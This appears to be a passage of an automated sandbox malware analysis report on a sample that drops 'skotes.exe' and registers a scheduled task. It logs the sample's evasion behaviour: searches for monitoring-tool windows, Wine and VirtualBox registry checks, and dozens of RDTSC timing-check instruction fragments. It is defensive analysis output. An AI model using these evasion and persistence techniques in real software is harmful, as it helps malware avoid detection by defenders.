                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Regmonclass
                    Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\skotes.job
                    Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D237F3 second address: D2384B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jno 00007FD2884F85F0h 0x0000000b jmp 00007FD2884F85D7h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD2884F85CAh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D23A08 second address: D23A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D23BC0 second address: D23BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D23D2C second address: D23D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A71h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D23D42 second address: D23D4C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD2884F85CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D27CB4 second address: D27CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FD288CC4A66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D27E46 second address: D27EB0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b je 00007FD2884F85C6h 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push ecx 0x00000015 jmp 00007FD2884F85CEh 0x0000001a pop ecx 0x0000001b nop 0x0000001c mov edi, dword ptr [ebp+122D383Bh] 0x00000022 push 00000000h 0x00000024 mov esi, dword ptr [ebp+122D3933h] 0x0000002a call 00007FD2884F85C9h 0x0000002f jmp 00007FD2884F85D1h 0x00000034 push eax 0x00000035 jbe 00007FD2884F85CEh 0x0000003b mov eax, dword ptr [esp+04h] 0x0000003f push eax 0x00000040 push edx 0x00000041 jc 00007FD2884F85CCh 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D27EB0 second address: D27EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D27EB4 second address: D27EB9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D27EB9 second address: D27EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jc 00007FD288CC4A6Ch 0x00000010 jnp 00007FD288CC4A66h 0x00000016 pushad 0x00000017 jnl 00007FD288CC4A66h 0x0000001d jp 00007FD288CC4A66h 0x00000023 popad 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D27EE7 second address: D27EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D27EEC second address: D27F3F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD288CC4A68h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d movzx ecx, dx 0x00000010 call 00007FD288CC4A77h 0x00000015 mov edx, 1FD70263h 0x0000001a pop edi 0x0000001b push 00000003h 0x0000001d movzx edx, di 0x00000020 push 00000000h 0x00000022 pushad 0x00000023 popad 0x00000024 push 00000003h 0x00000026 mov ecx, 0D0EC504h 0x0000002b push DB004F92h 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FD288CC4A6Eh 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D27F3F second address: D27F68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 xor dword ptr [esp], 1B004F92h 0x0000000e mov edx, dword ptr [ebp+122D36F7h] 0x00000014 xor edi, 4D752C05h 0x0000001a lea ebx, dword ptr [ebp+1244CBCDh] 0x00000020 mov cl, B9h 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D27F68 second address: D27F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D27F6C second address: D27F72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D28045 second address: D280D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 37E40C1Fh 0x00000010 mov edx, dword ptr [ebp+122D371Fh] 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007FD288CC4A68h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 push 00000000h 0x00000034 and esi, dword ptr [ebp+122D3787h] 0x0000003a push 00000003h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007FD288CC4A68h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000014h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 jno 00007FD288CC4A6Bh 0x0000005c push B9AE7F07h 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FD288CC4A79h 0x00000068 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D48B93 second address: D48B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D48B97 second address: D48BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D48BA5 second address: D48BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D48BAB second address: D48BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D117D0 second address: D117E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D117E5 second address: D117EF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD288CC4A72h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D47043 second address: D4704A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D4704A second address: D47090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FD288CC4A7Ch 0x0000000b jmp 00007FD288CC4A76h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jbe 00007FD288CC4A6Ah 0x00000019 push eax 0x0000001a pop eax 0x0000001b push edi 0x0000001c pop edi 0x0000001d jmp 00007FD288CC4A70h 0x00000022 jbe 00007FD288CC4A6Eh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D4736D second address: D47371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D4767B second address: D47685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD288CC4A66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D47948 second address: D4794C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D4794C second address: D47952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D47A84 second address: D47A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D47A89 second address: D47AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FD288CC4A66h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FD288CC4A76h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D3B07A second address: D3B07E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1F231 second address: D1F254 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD288CC4A71h 0x00000011 js 00007FD288CC4A66h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D4FA5E second address: D4FA80 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD2884F85D6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D4FCB4 second address: D4FCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D54E1C second address: D54E3A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD2884F85C6h 0x00000008 jmp 00007FD2884F85D0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D54E3A second address: D54E5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD288CC4A74h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D54E5C second address: D54E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D54E60 second address: D54E66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D54E66 second address: D54E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD2884F85CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D54E7C second address: D54E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D54515 second address: D5451D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5451D second address: D54521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D54521 second address: D54543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D54B29 second address: D54B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D54B2F second address: D54B34 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D54C9E second address: D54CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A79h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D54CC3 second address: D54CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D54CC7 second address: D54CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop ecx 0x0000000e jmp 00007FD288CC4A6Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D54CE6 second address: D54CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85CFh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58AB0 second address: D58AC7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD288CC4A72h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58AC7 second address: D58AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58AD4 second address: D58AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58AD8 second address: D58B25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D1h 0x00000007 jnp 00007FD2884F85C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FD2884F85D6h 0x00000015 jmp 00007FD2884F85D0h 0x0000001a jmp 00007FD2884F85CAh 0x0000001f popad 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58B25 second address: D58B2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D58B2D second address: D58B33 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D59505 second address: D5950C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5A09A second address: D5A0B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2884F85D8h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A1F7 second address: D5A202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD288CC4A66h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A33E second address: D5A347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A347 second address: D5A34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A34B second address: D5A34F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5AF59 second address: D5AF5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B90A second address: D5B90E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B90E second address: D5B917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D504 second address: D5D50A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DFF3 second address: D5DFF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61168 second address: D611AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FD2884F85E5h 0x0000000e jmp 00007FD2884F85D5h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D50A second address: D5D510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D510 second address: D5D514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D64273 second address: D64277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D652E6 second address: D652EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D644A0 second address: D644AA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D652EB second address: D65311 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD2884F85D1h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD2884F85CDh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D654E1 second address: D654E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D654E7 second address: D654EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D654EC second address: D65508 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD288CC4A70h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D671EA second address: D6726D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FD2884F85C8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 js 00007FD2884F85CAh 0x00000029 mov bx, A3F0h 0x0000002d push 00000000h 0x0000002f jno 00007FD2884F85D3h 0x00000035 mov dword ptr [ebp+12459F28h], esi 0x0000003b push 00000000h 0x0000003d jns 00007FD2884F85CCh 0x00000043 mov bx, 1E5Eh 0x00000047 xchg eax, esi 0x00000048 jl 00007FD2884F85D7h 0x0000004e jbe 00007FD2884F85D1h 0x00000054 jmp 00007FD2884F85CBh 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D663D6 second address: D6643F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or edi, 7500FA63h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 or bx, CC53h 0x00000025 mov eax, dword ptr [ebp+122D0099h] 0x0000002b and edi, 6CFCA46Fh 0x00000031 mov edi, dword ptr [ebp+122D39D7h] 0x00000037 push FFFFFFFFh 0x00000039 sub dword ptr [ebp+122D2608h], ecx 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 jmp 00007FD288CC4A76h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
